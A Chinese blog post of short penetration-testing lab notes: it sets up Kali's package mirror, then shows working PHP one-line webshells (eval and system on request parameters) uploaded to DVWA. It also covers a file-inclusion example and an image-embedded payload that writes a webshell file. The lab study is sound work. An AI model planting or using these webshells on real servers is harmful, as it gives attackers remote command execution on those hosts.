渗透

最新推荐文章于 2022-04-03 18:53:13 发布
最新推荐文章于 2022-04-03 18:53:13 发布
阅读量189 收藏
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45071021/article/details/104563123
版权

1,kail安装好操作系统,中文乱码
在这里插入图片描述
配置 Kali 的 apt 命令在线安装包的源为阿里云
sudo vim /etc/apt/sources.list
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
sudo apt-get update
sudo apt-get install ttf-wqy-zenhei
重启后正常

文件上传漏洞
22.php <?php @eval($_POST['chopper']);?>
33.php <?php @eval($_REQUEST['chopper']);?> #eval,使用PHP函数,例如phpinfo();
http://192.168.247.136/dvwa/hackable/uploads/33.php?chopper=phpinfo();
44.php <?php @system($_REQUEST['chopper']);?> #system,使用linux系统命令,例如ls,cp,rm
http://192.168.247.136/dvwa/hackable/uploads/44.php?chopper=id
REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构

文件包含漏洞
vim /var/www/dvwa/vulnerabilities/fi/1.php
http://192.168.247.136/dvwa/vulnerabilities/fi/?page=1.php

一句话图片木马
使用edjpgcom图片插入一句话工具插入以下内容

<?fputs(fopen("shell5.php","w"),'<?php eval($_POST[chopper]);?>')?>
时光~来复去
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透(一)
HJWYYQX的博客
06-23 324
渗透基础 一,常见术语: 1,脚本(asp,php,jsp) 2,html(css,js,html) 3,HTTP协议 4,CMS(B/S) 5,MD5 6,肉鸡,抓鸡,跳板 (保护自身安全) 7,一句话(木马),小马,大马,webshell,提权,后门,跳板 8,源码打包,脱裤(提出数据库的数据) 9,嗅探,rookit 二,渗透测试: 渗透测试是一种利用模拟黑客攻击的方式,来评估计算机网络系...
LNMP搭建Nextcloud-20.0.4私有同步云盘及配置redis缓存
weixin_45071021的博客
12-30 3058
Nextcloud是一款开源免费的私有云存储网盘项目,可以让你快速便捷地搭建一套属于自己或团队的云同步网盘,从而实现跨平台跨设备文件同步、共享、版本控制、团队协作等功能。 搭建版本:CentOS Linux release 7.9.2009 (Core)+Nextcloud-20.0.4+nginx/1.16.1+PHP 7.3.25+10.4.17-MariaDB 首先安装操作系统,我安装的是7.4的 cat /etc/redhat-release CentOS Linux release 7.4.17
Webbench学习笔记二:getopt_long函数和build_request函数
u014448875的博客
09-22 281
程序中调用如下: while((opt=getopt_long(argc,argv,"912Vfrt:p:c:?h",long_options,&options_index))!=EOF ) 这句话的意思是检索参数选项。分为三个部分讲解。 先说几个参数: argc:参数个数 argv:参数内容 “912Vfrt:p:c:?h”:程序支持的命令行短选项。也就是命令行中支持-9、-1、-2、-V、-f、-r、-t、-p、-c、-?、-h十一个短选项,其中t、p、c三个字符后面有一个冒号,表示t、p、
文件包含漏洞(绕过姿势)
求天下者,积少成多
06-01 9911
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p
如何入门渗透测试
热门推荐
qq_28205153的博客
04-03 5万+
转眼间,从大三开始学安全,到现在也有五年了,也算是对渗透测试有一定理解,公众号准备出一些入门教程,以实操为主,希望可以帮助到想入门渗透测试的小白。如果觉得有用,可以在文章后面支持一下我,作为我写下去的动力。 1. 什么是渗透测试 渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。 一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。 一定要注意的是,在.
渗透tomcat
m0_51589948的博客
07-16 1314
打开网页获取有效信息,Apache Tomcat/8.0.43及其醒目,猜测为一款软件以及他的版本号 不晓得tomca是什么,百度一波 Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含...
Firefox 52.0.2 渗透便携版
最新发布
05-23
**Firefox 52.0.2 渗透便携版** Firefox是一款开源的网络浏览器,以其高度可定制性、安全性和隐私保护而受到广大用户的喜爱。渗透测试是网络安全领域的一个重要环节,它涉及到对系统、应用程序或网络进行模拟攻击,...
网站渗透
11-19
文档存放百度云链接 链接失效 联系我
CentOS7下搭建OpenLDAP服务器
weixin_45071021的博客
01-11 718
前言 LDAP 是一款轻量级目录访问协议(Lightweight Directory Access Protocol,LDAP),LDAP轻量目录访问协议为用户管理提供了统一认证服务,解决了长期存在的多套用户认证系统孤立、繁杂、难以维护的问题。具有简捷、高效、易用的特性,是用户认证管理的不二选择,OpenLDAP属于开源集中账号管理架构的实现。 为什么用LDAP 要知道为什么,我们就需要了解LDAP能解决什么问题? 众所周知,当一个公司规模之后,会有无数的系统进行工作,如果每一个系统都需要注册自己的用户名,
lxc搭建虚拟机
weixin_45071021的博客
02-20 676
LXC是Linux containers的简称,是一种基于容器的操作系统层级的虚拟化技术。 cat /etc/redhat-release CentOS Linux release 7.4.1708 (Core) 系统版本7.4 yum install lxc-templates.x86_64 lxc.x86_64 lxc-libs.x86_64 -y 安装LXC相关的工具包,和创建容器所需要的...
模拟新机器批量设置IP地址
weixin_45071021的博客
01-18 494
之前同事生产系统批量安装600台服务器,当时他是做的无盘启动,最近在学习shell脚本,尝试写脚本安装,过程也很曲折,目前也有一些问题没解决,写下自己的安装过程 思路:一台机器安装DHCP服务器,设置一个地址池 ,开机后获取地址,前提是知道这些机器的序列号,新建一个excle表,分配上你想要的地址, 新建五台服务器,我是通过PXE安装的,大家也可以手动安装,网络我是使用的NAT模式,提示下,我当初...
2019-10 初识centos8.0
weixin_45071021的博客
10-07 196
https://blog.csdn.net/isaac365/article/details/90489499 今天本来想安装个树莓派系统玩玩,奈何下载速度太慢了,就先下载了个centos8玩玩, 1,nmcli配置网络 2,RHEL8配置yum源 cat /etc/yum.repos.d/CentOS-local.repo [local] name=local baseurl=file:///...
FTP搭建
weixin_45071021的博客
01-25 177
FTP协议 FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中...
VM虚拟机的3种网络模式:
weixin_45071021的博客
09-30 169
VM虚拟机的3种网络模式: Bridged(桥接最适合生产环境) 这种方式下,虚拟机就像一台真正的计算机一样,直接连接到实际的网络上,与宿主机没有任何联系。 NAT(NAT模式适合家庭环境) 这种方式下,虚拟机的网卡连接到宿主机的Vmnet 8上。此时系统的VMware NAT Service服务就充当了路由器的作用,负责将虚拟机发到VMnet8的包进行地址转换之后发到实际的网络上,再将实际网...
CENTOS7.4 vsftpd服务安装
weixin_45071021的博客
07-01 114
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
新手指南:手把手教你如何搭建自己的渗透测试环境1
08-08
"搭建渗透测试环境的新手指南,通过使用XAMPP、VMwareWorkstation以及KaliLinux等工具,创建安全的虚拟环境进行合法的黑客技术实践。" 本文将详细介绍如何为新手建立一个用于渗透测试的个人实验室。渗透测试是合法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值